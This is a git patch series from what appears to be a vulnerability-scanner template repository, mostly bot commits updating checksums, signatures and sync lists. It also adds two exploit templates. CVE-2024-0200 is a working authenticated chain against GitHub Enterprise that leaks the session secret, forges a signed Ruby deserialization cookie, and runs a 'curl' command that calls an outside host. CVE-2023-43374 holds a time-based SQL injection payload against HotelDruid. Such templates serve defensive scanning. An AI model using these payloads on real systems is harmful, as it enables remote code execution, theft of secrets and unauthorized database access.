+http/cves/2024/CVE-2024-31848.yaml:9af993dd7348e9e7863df89ef4f77c8458ad6147 http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf @@ -8496,7 +8497,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a1ca0edcd40435c24da57f95d469dcf0c40fbb41 +templates-checksum.txt:cb9e2075f90bfab0d4e013fc4d708e060379025b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7e2a9c4cf785892402c44cc2030bb086f4fcc72f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 11:42:41 +0000 Subject: [PATCH 0727/1768] Auto Template Signing [Wed May 8 11:42:41 UTC 2024] :robot: --- http/misconfiguration/microsoft/ms-exchange-local-domain.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml index 9a52bdceba..66de26d4bc 100644 --- a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml +++ b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml @@ -42,3 +42,4 @@ http: - type: kval kval: - x_calculatedbetarget +# digest: 490a0046304402205f025e53bc125c91f858165a0912ddc8edd46b6b2370f2ef02cad79aa821edb002200f38bd6dc2bf6d5add1b15173de97999b01080b7297cc21eeee3206f3aed7a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5c07afbcc31fe5581262f29f92b1a768dc85469d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 11:42:48 +0000 Subject: [PATCH 0728/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 11ae57e126..176bd8ba3a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -33,6 +33,7 @@ on: - 'http/cves/2024/CVE-2024-2876.yaml' - 'http/cves/2024/CVE-2024-3136.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' + - 'http/cves/2024/CVE-2024-31848.yaml' - 'http/cves/2024/CVE-2024-31849.yaml' - 'http/cves/2024/CVE-2024-31850.yaml' - 'http/cves/2024/CVE-2024-31851.yaml' From 43dc8312c0e867a57be2b00052769de6c944a326 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Wed, 8 May 2024 14:45:01 +0300 Subject: [PATCH 0729/1768] add cve-2022-1580 --- http/cves/2022/CVE-2022-1580.yaml | 52 +++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2022/CVE-2022-1580.yaml diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml new file mode 100644 index 0000000000..6fd7cfb485 --- /dev/null +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-1580 + +info: + name: Site Offline WP Plugin < 1.5.3 - Access Bypass + author: Kazgangap + severity: medium + description: | + The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 + - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2022-1580 + cwe-id: CWE-639 + epss-score: 0.00058 + epss-percentile: 0.23919 + cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* + metadata: + vendor: freehtmldesigns + product: site_offline + framework: wordpress + tags: wpscan,cve2022,bypass,wordpress,wordpress-plugin + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt" + + matchers: + - type: word + internal: true + words: + - 'Site Offline Or Coming Soon Or Maintenance Mode ' #Plugin Check + + - method: GET + path: + - "{{BaseURL}}/?admin" + + matchers-condition: and + matchers: + - type: word + words: + - "wp-block" + - "author" + condition: or + - type: status + status: + - 200 \ No newline at end of file From 048630964d571b0a5de3fe7b5f8876bb67722fc3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 12:08:05 +0000 Subject: [PATCH 0730/1768] Auto Generated New Template Addition List [Wed May 8 12:08:05 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a5c49539aa..d241aa85b6 100644 --- a/.new-additions +++ b/.new-additions @@ -56,6 +56,7 @@ http/misconfiguration/installer/sabnzbd-installer.yaml http/misconfiguration/microsoft/ms-exchange-local-domain.yaml http/misconfiguration/titannit-web-exposure.yaml http/takeovers/squadcast-takeover.yaml +http/vulnerabilities/citrix/citrix-oob-memory-read.yaml http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml http/vulnerabilities/titan/titannit-web-rce.yaml http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml From c65563ce28be9828839b6b062b2a2d8a1f33680b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 12:08:19 +0000 Subject: [PATCH 0731/1768] Auto Generated Templates Checksum [Wed May 8 12:08:19 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bccdf155f0..894d39cb30 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5497,7 +5497,7 @@ http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3 http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68 http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64 http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d -http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:df0c00b3b41457ba24efd8cc1d8066b130c7bdbb +http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:017a97227ca466c4831450986e59a3c99ea1f781 http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3 http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef @@ -7448,6 +7448,7 @@ http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:603bb5279bc4d http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:ea1ab53653cf1c170515c6ee5e6867b76f167b01 http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml:aef89b607f0527340246a54d607fb5a0c4533d5e http/vulnerabilities/cisco/cucm-username-enumeration.yaml:8f1f34c21c46c88b1faf80e11363097dc18d7c03 +http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:b31d091364cfce9c3384b7db96cf236992d044f4 http/vulnerabilities/code42/code42-log4j-rce.yaml:c6eca1ad5491f3ab51671acd9067242f3f77767e http/vulnerabilities/concrete/concrete-xss.yaml:85b12fb54e5f98736f4bc70df764384fe675f2f2 http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:305c4b65dec3bc65e31fcd5c0b72a9841e630064 @@ -8497,7 +8498,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cb9e2075f90bfab0d4e013fc4d708e060379025b +templates-checksum.txt:435e6048b63deb8509219645aafa7043cc65537c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f101970dc2ef7a39e459f8135e43e0875458fa3c Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 12:08:56 +0000 Subject: [PATCH 0732/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 176bd8ba3a..3875340387 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -61,6 +61,7 @@ on: - 'http/misconfiguration/microsoft/ms-exchange-local-domain.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' - 'http/takeovers/squadcast-takeover.yaml' + - 'http/vulnerabilities/citrix/citrix-oob-memory-read.yaml' - 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml' - 'http/vulnerabilities/titan/titannit-web-rce.yaml' - 'http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml' From 57b77722ffc0e9e54a7265e93abc741d74e06524 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 12:10:09 +0000 Subject: [PATCH 0733/1768] Auto Template Signing [Wed May 8 12:10:09 UTC 2024] :robot: --- http/cves/2024/CVE-2024-31848.yaml | 1 + http/vulnerabilities/citrix/citrix-oob-memory-read.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-31848.yaml b/http/cves/2024/CVE-2024-31848.yaml index 5bb9ea00c3..f7a29f8442 100644 --- a/http/cves/2024/CVE-2024-31848.yaml +++ b/http/cves/2024/CVE-2024-31848.yaml @@ -61,3 +61,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402207716de1b37106fd74b61c49cce61a5d2f0c123e701fc9e66b91a52b18a37ea2a02200cd509769de5850cafe5c0d9c721ec1c13740712ac9e7a26abe2917eddf7b9e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml index de4aff4e5d..ecd360c0fc 100644 --- a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml +++ b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml @@ -35,3 +35,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022029268cf1c208b75d1574dcacca609c1b7dd97714fc5af6ea19a836b938a9dd88022030724b51165dfb1ae133d2301f84e7af6c5856d43aa550ad6cdb40a86f86ab76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8d04a97f76202296210ac7b3673326950399c91f Mon Sep 17 00:00:00 2001 From: jason3e7 <jason3e7@gmail.com> Date: Wed, 8 May 2024 22:29:19 +0800 Subject: [PATCH 0734/1768] fix: typo in hikvision-env --- .../{hikivision-env.yaml => hikvision-env.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/misconfiguration/{hikivision-env.yaml => hikvision-env.yaml} (96%) diff --git a/http/misconfiguration/hikivision-env.yaml b/http/misconfiguration/hikvision-env.yaml similarity index 96% rename from http/misconfiguration/hikivision-env.yaml rename to http/misconfiguration/hikvision-env.yaml index 30c8d266d2..5f2ad77a02 100644 --- a/http/misconfiguration/hikivision-env.yaml +++ b/http/misconfiguration/hikvision-env.yaml @@ -1,4 +1,4 @@ -id: hikivision-env +id: hikvision-env info: name: Hikvision Springboot Env Actuator - Detect @@ -13,7 +13,7 @@ info: verified: true max-request: 5 shodan-query: app="HIKVISION-综合安防管理平台" - tags: misconfig,hikivision,springboot,env + tags: misconfig,hikvision,springboot,env http: - method: GET From a02dcf61d27c5d12758d0d55f3bd38c26d20fff0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 15:46:34 +0000 Subject: [PATCH 0736/1768] Auto Template Signing [Wed May 8 15:46:34 UTC 2024] :robot: --- http/misconfiguration/hikvision-env.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/misconfiguration/hikvision-env.yaml b/http/misconfiguration/hikvision-env.yaml index 5f2ad77a02..396a20e917 100644 --- a/http/misconfiguration/hikvision-env.yaml +++ b/http/misconfiguration/hikvision-env.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100effc47a075247114653ad921736cba15ecffd8c87f57d94f8ccaa224c6e36c5b022100cf025d5269ad1da196c4185a7d7632c6b4870893ac9484de57051d13d7d67ece:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100aba57f3fff77e8ea0837aba48a8e2518bfb62ce4052205ef76e703e275a8a68a0220198be2a746ade95cc4e1efb7231a6b97e68fc103a45c7b13f20299e01e18f9f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6e0963b27dfdfbed77978adefb11aed2e73cede3 Mon Sep 17 00:00:00 2001 From: idealphase <mynameisphase@gmail.com> Date: Thu, 9 May 2024 11:45:50 +0700 Subject: [PATCH 0737/1768] Update favicon-detect.yaml Added Veeam Service Provider Console favicon hash --- http/technologies/favicon-detect.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 281b659e8c..73b6a5f708 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3731,8 +3731,13 @@ http: dsl: - "status_code==200 && (\"-1599943282\" == mmh3(base64_py(body)))" + - type: dsl + name: "Veeam Service Provider Console" + dsl: + - "status_code==200 && (\"-1728967963\" == mmh3(base64_py(body)))" + extractors: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 4a0a00473045022100d5db6ca1e3fae692c3d73e04bb2b8f32fbb0ce71e9dbe0e5e2568124a785b0b902202a8410c129ccda07db2f0cff823f28efc91b909fe40a147716b71e8f016a177e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d5db6ca1e3fae692c3d73e04bb2b8f32fbb0ce71e9dbe0e5e2568124a785b0b902202a8410c129ccda07db2f0cff823f28efc91b909fe40a147716b71e8f016a177e:922c64590222798bb761d5b6d8e72950 From 80577f4a0468b656a91be0dec85ad8766e8e9447 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Egemen=20Ko=C3=A7hisarl=C4=B1?= <105934393+EgemenKochisarli@users.noreply.github.com> Date: Thu, 9 May 2024 12:47:17 +0300 Subject: [PATCH 0738/1768] Create f5-next-central-manager.yaml Adds template for detect BIG-IP Next Central Manager Login panels --- .../f5-next-central-manager.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/exposed-panels/f5-next-central-manager.yaml diff --git a/http/exposed-panels/f5-next-central-manager.yaml b/http/exposed-panels/f5-next-central-manager.yaml new file mode 100644 index 0000000000..9dd2622c7b --- /dev/null +++ b/http/exposed-panels/f5-next-central-manager.yaml @@ -0,0 +1,38 @@ +id: f5-next-central-manager + +info: + name: F5 Next Central Manager Login Panel - Detect + author: EgemenKochisarli + severity: info + description: F5 Next Central Manager login panel was detected. + reference: + - https://clouddocs.f5.com/bigip-next/latest/use_cm/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + cpe: cpe:2.3:h:f5:big-ip:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + product: bigip + vendor: big-ip_next_central_manager + tags: panel,fortinet + +http: + - method: GET + path: + - "{{BaseURL}}/gui/login" + + matchers-condition: and + matchers: + - type: word + words: + - "<title>BIG-IP Next | Central Manager" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From ea7b07c4cb93b256f23732d2b2c12d70b7638cae Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 9 May 2024 16:39:50 +0530 Subject: [PATCH 0739/1768] Create CVE-2024-0200.yaml --- http/cves/2024/CVE-2024-0200.yaml | 143 ++++++++++++++++++++++++++++++ 1 file changed, 143 insertions(+) create mode 100644 http/cves/2024/CVE-2024-0200.yaml diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml new file mode 100644 index 0000000000..231a81e3fd --- /dev/null +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -0,0 +1,143 @@ +id: CVE-2024-0200 + +info: + name: Github Enterprise Authenticated Remote Code Execution + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. + reference: + - https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/ + - https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/ + - https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5 + - https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3 + - https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-0200 + cwe-id: CWE-470 + epss-score: 0.0037 + epss-percentile: 0.72517 + cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* + metadata: + vendor: github + product: enterprise_server + shodan-query: title:"GitHub Enterprise" + fofa-query: app="Github-Enterprise" + verified: true + tags: cve,cve2024,rce,github,enterprise + +variables: + username: "{{username}}" + password: "{{password}}" + oast: "curl {{interactsh-url}}/?" + padstr: "{{randstr}}" + payload: '{{padding(oast,padstr,300)}}' + marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT' + b64_marshal_data: "{{base64(url_decode(marshal_data))}}" + digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}" + final_payoad: "{{ b64_marshal_data + '--' + digest}}" + +http: + - method: GET + path: + - "{{BaseURL}}/api/v3/user/orgs" + headers: + Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}" + extractors: + - type: json + part: body + name: org_name + internal: true + json: + - ".[].login" + + - method: GET + path: + - "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}" + headers: + Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}" + matchers-condition: and + matchers: + - type: word + words: + - '"role": "admin"' + part: body + + - method: POST + path: + - "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos" + headers: + Content-Type: application/json + Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}" + body: | + { + "name": "{{randstr}}" + } + matchers: + - type: status + status: + - 201 + + - method: GET + cookie-reuse: true + path: + - "{{BaseURL}}/login" + extractors: + - type: regex + part: body + internal: true + group: 1 + regex: + - 'name="authenticity_token" value="(.*?)"' + name: csrf_token + + - method: POST + path: + - "{{BaseURL}}/session" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}& + matchers: + - type: status + status: + - 302 + - type: word + words: + - "_gh_render" + part: header + + - method: GET + path: + - "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck" + extractors: + - type: regex + group: 1 + name: ghe_secret + internal: true + regex: + - '"ENTERPRISE_SESSION_SECRET"=>"([^"]+?)"' + part: body + matchers: + - type: word + words: + - 'ENTERPRISE_SESSION_SECRET' + part: body + + - method: GET + path: + - "{{BaseURL}}/" + headers: + Cookie: _gh_render={{final_payoad}} + + matchers-condition: and + matchers: + - type: status + status: + - 500 + - type: word + part: interactsh_protocol + words: + - "dns" From b46189197f862347b9b48fdd84fb2e05f6a5dc9a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 9 May 2024 16:43:00 +0530 Subject: [PATCH 0740/1768] Update and rename http/misconfiguration/setup-github-enterprise.yaml to http/misconfiguration/installer/setup-github-enterprise.yaml --- .../{ => installer}/setup-github-enterprise.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/misconfiguration/{ => installer}/setup-github-enterprise.yaml (93%) diff --git a/http/misconfiguration/setup-github-enterprise.yaml b/http/misconfiguration/installer/setup-github-enterprise.yaml similarity index 93% rename from http/misconfiguration/setup-github-enterprise.yaml rename to http/misconfiguration/installer/setup-github-enterprise.yaml index de6a2fd061..bddf943674 100644 --- a/http/misconfiguration/setup-github-enterprise.yaml +++ b/http/misconfiguration/installer/setup-github-enterprise.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1373456171 - tags: panel,exposure,setup,github,misconfig + tags: misconfig,installer,github,setup http: - method: GET From bb538fa2adceff1b30957ba5bdb4c1dca2480248 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 9 May 2024 16:44:16 +0530 Subject: [PATCH 0741/1768] fix trail space --- http/cves/2024/CVE-2024-0200.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index 231a81e3fd..d7eb5bd794 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -5,7 +5,7 @@ info: author: iamnoooob,rootxharsh,pdresearch severity: critical description: | - An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. + An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3. reference: - https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/ - https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/ @@ -37,7 +37,7 @@ variables: marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT' b64_marshal_data: "{{base64(url_decode(marshal_data))}}" digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}" - final_payoad: "{{ b64_marshal_data + '--' + digest}}" + final_payoad: "{{ b64_marshal_data + '--' + digest}}" http: - method: GET From e1d5472d5aefdfcf2b4fd8e61a3a7906bb9144e7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 9 May 2024 16:47:00 +0530 Subject: [PATCH 0742/1768] minor update --- .../{ => fortinet}/f5-next-central-manager.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename http/exposed-panels/{ => fortinet}/f5-next-central-manager.yaml (82%) diff --git a/http/exposed-panels/f5-next-central-manager.yaml b/http/exposed-panels/fortinet/f5-next-central-manager.yaml similarity index 82% rename from http/exposed-panels/f5-next-central-manager.yaml rename to http/exposed-panels/fortinet/f5-next-central-manager.yaml index 9dd2622c7b..20b89da3fe 100644 --- a/http/exposed-panels/f5-next-central-manager.yaml +++ b/http/exposed-panels/fortinet/f5-next-central-manager.yaml @@ -4,7 +4,8 @@ info: name: F5 Next Central Manager Login Panel - Detect author: EgemenKochisarli severity: info - description: F5 Next Central Manager login panel was detected. + description: | + F5 Next Central Manager login panel was detected. reference: - https://clouddocs.f5.com/bigip-next/latest/use_cm/ classification: @@ -12,10 +13,11 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:f5:big-ip:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 - product: bigip - vendor: big-ip_next_central_manager - tags: panel,fortinet + vendor: f5 + product: big-ip + tags: panel,fortinet,login http: - method: GET From cf6351c0b69302013cf3f1dcca3e736e662e39b9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 9 May 2024 17:03:01 +0530 Subject: [PATCH 0743/1768] Create CVE-2023-43374.yaml --- http/cves/2023/CVE-2023-43374.yaml | 63 ++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 http/cves/2023/CVE-2023-43374.yaml diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml new file mode 100644 index 0000000000..65b4325ac3 --- /dev/null +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -0,0 +1,63 @@ +id: CVE-2023-43374 + +info: + name: Hoteldruid v3.0.5 - SQL Injection + author: ritikchaddha + severity: critical + description: | + Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php. + impact: | + Successful exploitation could lead to unauthorized access to sensitive data or complete takeover of the affected system. + remediation: | + Upgrade Hoteldruid to a patched version that addresses the SQL Injection vulnerability. + reference: + - https://flashy-lemonade-192.notion.site/SQL-injection-in-hoteldruid-version-3-0-5-via-id_utente_log-parameter-8b89f014004947e7bd2ecdacf1610cf9 + - https://nvd.nist.gov/vuln/detail/CVE-2023-43374 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-43374 + cwe-id: CWE-89 + epss-score: 0.00076 + epss-percentile: 0.31944 + cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: digitaldruid + product: hoteldruid + shodan-query: title:"HotelDruid" + fofa-query: title="HotelDruid" + tags: cve,cve2023,hoteldruid,cms,sqli + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /hoteldruid/inizio.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - "HotelDruid" + internal: true + + - raw: + - | + POST /hoteldruid/personalizza.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + aggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1 + + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code == 200' + - 'contains(body, "HotelDruid:")' + condition: and From 42b368743c391719a0f2c5b2299012704c3574b6 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Thu, 9 May 2024 19:25:18 +0200 Subject: [PATCH 0744/1768] Update netscaler-aaa-login.yaml --- http/exposed-panels/netscaler-aaa-login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/netscaler-aaa-login.yaml b/http/exposed-panels/netscaler-aaa-login.yaml index 0f98f074fc..84b95058b4 100644 --- a/http/exposed-panels/netscaler-aaa-login.yaml +++ b/http/exposed-panels/netscaler-aaa-login.yaml @@ -2,7 +2,7 @@ id: netscaler-aaa-login info: name: NetScaler AAA Login Panel - Detect - author: dhiyaneshDk + author: dhiyaneshDk,righettod severity: info description: NetScaler AAA login panel was detected. reference: @@ -26,5 +26,5 @@ http: - type: word words: - "NetScaler AAA" - condition: and -# digest: 4a0a004730450221009bc41767207ec08510c28fd7db74f0a6be829e289c5817412fbf7c1a17229135022002a8cc7233b69e588e94f5ed9919a36b6964009eab52b096e3017b499ef78f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "_ctxstxt_NetscalerAAA" + condition: or From b71bf1b68351f10b0b951408446c3afd9977b263 Mon Sep 17 